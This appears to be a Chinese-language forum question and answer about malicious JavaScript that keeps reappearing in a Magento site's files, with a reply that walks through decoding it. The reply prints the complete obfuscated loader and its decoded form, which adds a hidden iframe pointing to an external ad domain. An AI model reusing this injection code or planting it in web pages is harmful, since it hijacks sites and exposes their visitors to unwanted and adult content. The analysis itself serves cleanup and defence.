b33a8df2*/
我用 rkhunter 和 clamav 检查了网络服务器,但没有找到任何东西,从备份存档中替换可以工作 1 天,而且这段代码会再次从我的文件中自行写入,我在这个博客中找到了一些东西:Massive Admedia/Adverting iFrame Infection这和我的完全一样,除了我使用的是 magento。
我已经精疲力竭地解决这个问题,需要你的帮助。 如果你找到了解决这个问题的方法,我将不胜感激。 谢谢
技术
"\x64\x6f"被解码为do,只需将其粘贴到浏览器控制台,就会显示解码后的字符串
所以 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x7a\x7a\x7a\x61\x69"] 是 window["document"]["zzzai"]
eval() 是 javascript 来自字符串的代码评估,因此 eval("alert('text')") 将抛出警报,尽管函数在字符串中。
所有这些代码只是隐藏了简单的东西,所以它看起来像一些内部浏览器的东西或插件库
总结
解码后的脚本看起来像这样
window["293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f76726f742e"]
var bhtad=ftrsn=nkkkk=knzsd=rbikr=window.document.zzzai;
(function(){
var hinbt="";
var tzzhi="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822316535313439633538313335323539396238366630346365353134396335383133353235393962383666303463313231373031363261222c226131363134663663653235306661623462396161313734633966383266623264222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f76726f742e737465727661706f696d656e69616c656e612e696e666f2f6d656761616476657274697a652f3f6b6579776f72643d6137646135633632386531363038376664666432323061656261613434626561223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";
for (var dadaa=0; dadaa < tzzhi.length; dadaa+=2) {
hinbt = hinbt + parseInt(tzzhi.substring(dadaa, dadaa + 2), 16) + ",";
}
hinbt = hinbt.substring(0, hinbt.length - 1);
eval(eval('String.fromCharCode(' + hinbt + ')'));
})();
它的执行会将带有成人内容的 iframe 注入页面
window.onload = function(){
function x22bq(a,b,c){
if(c){
var d = new Date();
d.setDate(d.getDate() + c);
}
if(a && b) document.cookie = a+'='+b+(c ? '; expires='+d.toUTCString() : '');
else return false;
}
function x33bq(a){
var b = new RegExp(a+'=([^;]){1,}');
var c = b.exec(document.cookie);
if(c) c = c[0].split('=');
else return false;
return c[1] ? c[1] : false;
}
var x33dq = x33bq("1e5149c581352599b86f04ce5149c581352599b86f04c12170162a","a1614f6ce250fab4b9aa174c9f82fb2d",1);
var x22dq = document.createElement("div");
var x22qq = "http://vrot.stervapoimenialena.info/megaadvertize/?keyword=a7da5c628e16087fdfd220aebaa44bea";
x22dq.innerHTML="<div style='position:absolute;z-index:1000;top:-1000px;left:-9999px;'><iframe src='"+x22qq+"'></iframe></div>";
document.body.appendChild(x22dq);
}
所以它插入了来自 http://vrot.stervapoimenialena.info/megaadvertize/?keyword=a7da5c628e16087fdfd220aebaa44bea url 的广告,这就是我所知道的